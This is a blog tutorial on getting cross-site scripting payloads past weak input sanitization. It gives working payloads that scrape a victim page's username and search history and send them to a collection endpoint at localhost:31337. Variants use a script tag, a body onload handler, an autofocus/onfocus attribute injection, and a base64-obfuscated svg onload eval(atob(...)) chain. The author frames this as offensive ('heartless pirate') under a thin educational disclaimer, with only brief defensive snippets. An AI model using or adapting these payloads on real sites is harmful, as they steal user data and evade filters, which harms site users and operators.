XSS Attacks: advanced techniques to bypass data sanitization

Nov 4, 2023

Disclaimer: this tutorial is for educational purposes only. I am not liable if you do something illegal with these techniques. I just think they are pretty cool and worth sharing.

What is an XSS attack?

TLDR: XSS attacks allow JavaScript code to be injected into the DOM of a website and then run directly. Skip to Bypassing data sanitization for the techniques themselves.

Cross-Site Scripting (XSS) is a type of security vulnerability or attack that occurs when a web application allows malicious users to inject malicious scripts into web pages viewed by other users. These scripts are typically written in JavaScript but can be written in other scripting languages as well.

XSS attacks come in different forms, including:

Stored XSS: In this type, the injected script is permanently stored on the web server. When other users access the compromised page, the malicious script is executed.
Reflected XSS: With reflected XSS, the malicious script is not stored on the server but rather reflected off a web application. This typically occurs when a user clicks on a specially crafted link containing the malicious payload.
DOM-based XSS: In this variant, the attack is based on the manipulation of the Document Object Model (DOM) of a web page by injecting malicious scripts. These attacks typically target the client-side code and do not involve communication with the server.

XSS attacks can have serious consequences, including:

Data Theft: Attackers can steal sensitive data, such as login credentials, personal information, and session cookies from unsuspecting users. This stolen information can be used for identity theft or other malicious activities.
Session Hijacking: Malicious scripts can hijack user sessions, allowing attackers to impersonate legitimate users and perform unauthorized actions on their behalf.
Phishing: Attackers can create convincing phishing pages that trick users into entering sensitive information, believing they are interacting with a legitimate site.
Defacement: Injected scripts can modify the appearance and content of a website, defacing it and damaging the site’s reputation.

Data sanitization: a defense (kind of)

XSS vulnerabilities occur when a web application takes user input (say, a comment on a blog post) and injects it directly into the DOM (Document Object Model). This means that any user input is suspect: login, sign-up, and comment forms are all good entry points for an attack.

To avoid this, a developer can sanitize the data coming in through these forms. Sanitization involves cleaning, validating, and escaping input so that it cannot be executed as code within the web application. Cleaning and validation ensure that input adheres to expected formats and remove potentially harmful content (such as anything that can be interpreted as script). Escaping encodes special characters so that they are displayed as text rather than interpreted as code. The most basic example of an XSS attack is the following:

An attacker finds a comment form that they realize injects directly into the website DOM. They then enter the following into the form:

<script>alert("Hacked")</script>

If the web application sanitizes its input, the script tag (<script>) will not be executed as code. Applications do this in various ways, but one common (and weak) approach is to simply strip out the <script> and </script> tags whenever they appear in input. That leaves just the following, which the browser renders as plain text:

alert("Hacked")
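To make the stripping step concrete, here is a minimal sketch of such a filter. The function name stripScriptTags and the regular expression are my own assumptions for illustration, not code taken from any real application or library.

```javascript
// Hypothetical naive filter: removes only <script> and </script> tags
// and leaves everything else in the input untouched.
function stripScriptTags(input) {
  return input.replace(/<\/?script[^>]*>/gi, "");
}

const comment = '<script>alert("Hacked")</script>';
const cleaned = stripScriptTags(comment);
console.log(cleaned); // alert("Hacked")
```

The tags are gone, so the browser shows the rest as text. Nothing else about the input was inspected, though, and that is the weakness the rest of this post leans on.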

Bypassing data sanitization

Now for the juicy details you’ve been waiting for… how can we get around this and still get our script to execute? While any half-decent web application will use an industry-standard sanitization library for the input it takes in, many do the bare minimum and just strip script tags like I did in the example above. That’s not good news for them, but great news for you as a heartless pirate!

Let’s imagine that I’m a malicious actor and I want the following script to execute on my victim’s web application. The code grabs a hypothetical username and search history item from our victim’s page, then sends this stolen data to our endpoint, http://localhost:31337, muhahah.

 <script>
 setTimeout(() => {
 var username = document.getElementById("logged-in-user");
 var userText = username.textContent;
 var lastSearch = document.getElementsByClassName("history-item list-group-item")[1];
 var searchText = lastSearch.textContent;
 $.get('http://localhost:31337/stolen?user='+userText+'&last_search='+searchText);
 }, 3000);   
 </script>

Technique 1: using a <body> tag (avoids <script>)

<body onload="setTimeout(() => {
    var username = document.getElementById('logged-in-user');
    var userText = username.textContent;
    var dataText = (document.getElementsByClassName('history-item list-group-item'))[1].textContent;
    $.get('http://localhost:31337/stolen?user='+userText+'&last_search='+dataText);
}, 0)">

Here we use a <body> tag with an onload attribute to execute our payload without <script> tags. The value of an onload attribute is treated as JavaScript and runs when the element loads, so we don’t need <script> tags at all. Sneaky! This means that if the web application only checks input for script tags, we still get through the sanitization process.
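A small sketch of why a script-tag filter misses this, next to what escaping does with the same input. Both stripScriptTags and escapeHtml are hypothetical helpers written for this post, and the alert(1) handler is just a stand-in for a real payload.

```javascript
// Hypothetical naive filter that only knows about <script> tags.
function stripScriptTags(input) {
  return input.replace(/<\/?script[^>]*>/gi, "");
}

// Hypothetical escaping helper: turns characters that are special in HTML
// into entities so the browser displays them instead of parsing them.
function escapeHtml(input) {
  return input
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

const payload = '<body onload="alert(1)">';
console.log(stripScriptTags(payload)); // <body onload="alert(1)">
console.log(escapeHtml(payload));      // &lt;body onload=&quot;alert(1)&quot;&gt;
```

The stripping filter returns the payload unchanged because it never contained a script tag. The escaped version no longer contains any markup at all, which is why escaping on output tends to hold up better than removing a list of known-bad tags.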

Technique 2: using onfocus (avoids common tags)

autofocus onfocus=setTimeout(() => {
    var username = document.getElementById('logged-in-user');
    var userText = username.textContent;
    var dataText = (document.getElementsByClassName('history-item list-group-item'))[1].textContent;
    $.get('http://localhost:31337/stolen?user='+userText+'&last_search='+dataText);
}, 0) x=

Let’s be realistic and assume that your target website uses a half-decent sanitization library. It will probably remove common HTML tags such as <body>, <script>, and <img>, and with them angle brackets in general. So what do we do? This technique applies when our input lands inside an existing tag, for example in an attribute value. The code above adds an onfocus handler that executes JavaScript when the element receives focus, plus the autofocus attribute to try to trigger onfocus automatically without any user interaction. Finally, the trailing x= absorbs whatever markup follows the injection point so the tag stays well formed. The handler is spread over several lines here for readability; an unquoted attribute value ends at the first whitespace or > character, so a real injection has to be written to fit the attribute it lands in. Because this avoids introducing new tags, it can bypass filters that only look for them.
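Here is a rough sketch of the attribute context this relies on. Everything in it is an assumption for illustration: the renderSearchBox template, the stripAngleBrackets filter, and the leading double quote on the input (which is what closes the original value attribute and is not part of the payload shown above). The handler is a harmless alert(1).

```javascript
// Hypothetical filter: removes angle brackets but leaves quotes alone.
function stripAngleBrackets(input) {
  return input.replace(/[<>]/g, "");
}

// Hypothetical template that reflects a search term inside a quoted attribute.
function renderSearchBox(term) {
  return '<input name="q" value="' + stripAngleBrackets(term) + '">';
}

// Assumed input: the leading quote ends the value attribute early,
// and the trailing x=" pairs up with the template's own closing quote.
const term = '" autofocus onfocus=alert(1) x="';
const html = renderSearchBox(term);
console.log(html);
// <input name="q" value="" autofocus onfocus=alert(1) x="">
```

No angle brackets were needed, so the filter had nothing to remove. Escaping the double quote as &quot; before building the attribute would have kept the whole input inside value.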

Technique 3: Base64 encoding (avoids ", ' and ;)

<svg onload=eval(atob(/c2V0VGltZW91dCgoKSA9PiB7dmFyIHVzZXJuYW1lID0gZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoJ2xvZ2dlZC1pbi11c2VyJyk7IHZhciB1c2VyVGV4dCA9IHVzZXJuYW1lLnRleHRDb250ZW50OyB2YXIgZGF0YVRleHQgPSAoZG9jdW1lbnQuZ2V0RWxlbWVudHNCeUNsYXNzTmFtZSgnaGlzdG9yeS1pdGVtIGxpc3QtZ3JvdXAtaXRlbScpWzFdKS50ZXh0Q29udGVudDsgJC5nZXQoJ2h0dHA6Ly9sb2NhbGhvc3Q6MzEzMzcvc3RvbGVuP3VzZXI9Jyt1c2VyVGV4dCsnJmxhc3Rfc2VhcmNoPScrZGF0YVRleHQpO30sMzAwMCk7/.source)))

Okay… this one is pretty clever! To avoid single quotes, double quotes, and semicolons we have to get creative. First I took our script payload from the top of this section and encoded it as base64 (any online encoder will do). This outputs the long, garbled-looking string of characters that you see above. Next we place that string between two forward slashes, which turns it into a regular expression literal, and read its .source property:

/c2V0VGltZW91dCgoKSA9PiB7dmFyIHVzZXJuYW1lID0gZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoJ2xvZ2dlZC1pbi11c2VyJyk7IHZhciB1c2VyVGV4dCA9IHVzZXJuYW1lLnRleHRDb250ZW50OyB2YXIgZGF0YVRleHQgPSAoZG9jdW1lbnQuZ2V0RWxlbWVudHNCeUNsYXNzTmFtZSgnaGlzdG9yeS1pdGVtIGxpc3QtZ3JvdXAtaXRlbScpWzFdKS50ZXh0Q29udGVudDsgJC5nZXQoJ2h0dHA6Ly9sb2NhbGhvc3Q6MzEzMzcvc3RvbGVuP3VzZXI9Jyt1c2VyVGV4dCsnJmxhc3Rfc2VhcmNoPScrZGF0YVRleHQpO30sMzAwMCk7/.source

The .source property returns the text between the slashes as a string, which lets us avoid quotation marks entirely. If this doesn’t make sense, maybe the following statement will:

/c2V0VGltZW91dCgoKSA9PiB7dmFyIHVzZXJuYW1lID0gZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoJ2xvZ2dlZC1pbi11c2VyJyk7IHZhciB1c2VyVGV4dCA9IHVzZXJuYW1lLnRleHRDb250ZW50OyB2YXIgZGF0YVRleHQgPSAoZG9jdW1lbnQuZ2V0RWxlbWVudHNCeUNsYXNzTmFtZSgnaGlzdG9yeS1pdGVtIGxpc3QtZ3JvdXAtaXRlbScpWzFdKS50ZXh0Q29udGVudDsgJC5nZXQoJ2h0dHA6Ly9sb2NhbGhvc3Q6MzEzMzcvc3RvbGVuP3VzZXI9Jyt1c2VyVGV4dCsnJmxhc3Rfc2VhcmNoPScrZGF0YVRleHQpO30sMzAwMCk7/.source
is the same as writing the following:
"c2V0VGltZW91dCgoKSA9PiB7dmFyIHVzZXJuYW1lID0gZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoJ2xvZ2dlZC1pbi11c2VyJyk7IHZhciB1c2VyVGV4dCA9IHVzZXJuYW1lLnRleHRDb250ZW50OyB2YXIgZGF0YVRleHQgPSAoZG9jdW1lbnQuZ2V0RWxlbWVudHNCeUNsYXNzTmFtZSgnaGlzdG9yeS1pdGVtIGxpc3QtZ3JvdXAtaXRlbScpWzFdKS50ZXh0Q29udGVudDsgJC5nZXQoJ2h0dHA6Ly9sb2NhbGhvc3Q6MzEzMzcvc3RvbGVuP3VzZXI9Jyt1c2VyVGV4dCsnJmxhc3Rfc2VhcmNoPScrZGF0YVRleHQpO30sMzAwMCk7"

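The same equivalence is easier to see with a short pattern. This is just a toy check; the pattern abc123 is an arbitrary placeholder.

```javascript
// A regular expression literal exposes its pattern text through .source,
// so we get a string without typing a single quote character.
const fromRegex = /abc123/.source;

console.log(typeof fromRegex);       // string
console.log(fromRegex === "abc123"); // true
```

This only works cleanly because the text contains no forward slash, which would end the literal early. The base64 string above happens not to contain one.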
Next we take this base64 payload and decode it at runtime with atob(), a built-in function that decodes a base64-encoded string back into its original text. In our context:

atob(/c2V0VGltZW91dCgoKSA9PiB7dmFyIHVzZXJuYW1lID0gZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoJ2xvZ2dlZC1pbi11c2VyJyk7IHZhciB1c2VyVGV4dCA9IHVzZXJuYW1lLnRleHRDb250ZW50OyB2YXIgZGF0YVRleHQgPSAoZG9jdW1lbnQuZ2V0RWxlbWVudHNCeUNsYXNzTmFtZSgnaGlzdG9yeS1pdGVtIGxpc3QtZ3JvdXAtaXRlbScpWzFdKS50ZXh0Q29udGVudDsgJC5nZXQoJ2h0dHA6Ly9sb2NhbGhvc3Q6MzEzMzcvc3RvbGVuP3VzZXI9Jyt1c2VyVGV4dCsnJmxhc3Rfc2VhcmNoPScrZGF0YVRleHQpO30sMzAwMCk7/.source)
is functionally the same as writing (variable names and spacing differ slightly in the encoded version):

setTimeout(() => {
 var username = document.getElementById("logged-in-user");
 var userText = username.textContent;
 var lastSearch = document.getElementsByClassName("history-item list-group-item")[1];
 var searchText = lastSearch.textContent;
 $.get('http://localhost:31337/stolen?user='+userText+'&last_search='+searchText);
 }, 3000);
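If you want to see the encode/decode round trip on something small, here is a quick sketch. It assumes an environment where btoa and atob are globals, which is the case in browsers and in recent Node.js versions; the string 1+1 is an arbitrary harmless example.

```javascript
// btoa encodes a string to base64, atob reverses it.
const encoded = btoa("1+1");
const decoded = atob(encoded);

console.log(encoded); // MSsx
console.log(decoded); // 1+1
```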

Finally, we wrap the decoded string in eval and place the whole expression in the onload attribute of an <svg> tag. Walking through this: eval takes the decoded string and runs it as JavaScript, and the onload attribute triggers the whole chain when the element loads. So when the injected line is rendered, our original payload runs.
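The whole chain can be traced step by step with a harmless expression in place of the payload. This is a sketch under the same assumption as before (atob available as a global); MSsx is simply the base64 encoding of 1+1.

```javascript
// Step 1: the regex literal gives us the base64 text as a string, no quotes needed.
const source = /MSsx/.source; // the string MSsx

// Step 2: atob decodes the base64 text back into source code.
const code = atob(source);    // the string 1+1

// Step 3: eval runs the decoded string as JavaScript.
const result = eval(code);

console.log(result); // 2
```

Written inline, the three steps collapse into eval(atob(/MSsx/.source)), which has the same shape as the expression inside the onload attribute above.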

Closing thoughts

While these techniques are pretty sneaky, they will not bypass every sanitization library (for example, none of them will work on Facebook comment forms). However, I hope this brief tutorial gave you a taste of what you can do to get around data sanitization. I only scratched the surface, and if you keep sharpening the techniques above, you can adapt them to more specific use cases (especially the base64 one). If you have any questions, feel free to comment, and if you got this far, thanks for reading :)!